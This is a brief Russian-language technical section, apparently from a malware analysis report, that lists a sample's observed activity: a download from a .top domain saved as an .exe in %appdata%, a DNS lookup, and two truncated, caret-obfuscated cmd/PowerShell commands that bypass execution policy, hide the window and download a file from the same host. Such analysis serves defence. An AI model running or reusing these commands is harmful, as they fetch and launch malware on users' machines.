Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWER^sh^ELl.^EXE^ -^EXeCu^tIOnpOL^iCy^ bypAs^S ^-^n^OproF^Ile^ -w^i^nd^owS^T^y^Le ^Hi^Dd^EN^ (nEw-^o^B^jE^C^T ^sYstem.neT.^we^bCl^ient^).^dO^WN^l^OADf^ile('http://www.zoerpol...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "pOWER^sh^ELl.^EXE^ -^EXeCu^tIOnpOL^iCy^ bypAs^S ^-^n^OproF^Ile^ -w^i^nd^owS^T^y^Le ^Hi^Dd^EN^ (nEw-^o^B^jE^C^T ^sYstem.neT.^we^bCl^ient^).^dO^WN^l^OADf^ile('http://www.zoerpol...' (со скрытым окном)